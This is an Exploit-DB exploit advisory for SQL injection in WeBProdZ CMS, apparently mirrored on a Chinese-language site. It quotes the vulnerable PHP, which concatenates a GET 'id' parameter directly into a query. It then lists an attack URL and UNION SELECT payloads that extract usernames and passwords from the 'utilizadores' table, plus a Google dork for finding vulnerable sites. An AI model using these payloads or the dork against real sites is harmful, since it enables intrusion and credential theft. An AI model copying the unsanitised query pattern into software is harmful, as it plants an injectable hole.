WeBProdZ CMS – SQL Injection - 体验盒子

作者： MasterGipy

日期： 2010-05-06

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/12522/

_______ _ _ 
| ___ \| | | | (_)
| |_/ /_____ _____ | |_ _| |_ _____ __
|// _ \ \ / / _ \| | | | | __| |/ _ \| '_ \ 
| |\ \__/\ V / (_) | | |_| | |_| | (_) | | | | 
\_| \_\___| \_/ \___/|_|\__,_|\__|_|\___/|_| |_| 

_______________ 
 |_ _||_||_|
 | | _____ _ _ __ ___ | |/' || |_| |
 | |/ _ \/ _` | '_ ` _ \|/| |\____ |
 | |__/ (_| | | | | | | \ |_/ /.___/ /
 \_/\___|\__,_|_| |_| |_|\___/ \____/

_____________________________________________________________
 
[$] Exploit Title : WeBProdZ CMS SQL Injection Vulnerability
[$] Date: 06-05-2010
[$] Author: MasterGipy
[$] Email : mastergipy [at] gmail.com
[$] Bug : SQL Injection Vulnerability
[$] Google Dork : "Desenvolvido por WeBProdZ"

[$] Vulnerable code in /backoffice/textos/editar.php

<?php 
include_once("../../ligacao/connDB.php");
$sql = "select * from textos where idtextos=".$_GET["id"];

$j2 = mysql_query($sql);
$o=mysql_fetch_object($j2);
?>

[$] Exploit

[+] http://[site]/backoffice/textos/editar.php?id=1<- SQL

[+] sql_1: -1 UNION ALL SELECT 1,2,3--
[+] sql_2: -1 UNION ALL SELECT 1,2,concat(username,char(58),password)+from+utilizadores--
[+] sql_3: -1 UNION ALL SELECT 1,2,concat(username,char(58),password_ori)+from+utilizadores--


[$] Greetings from PORTUGAL ^^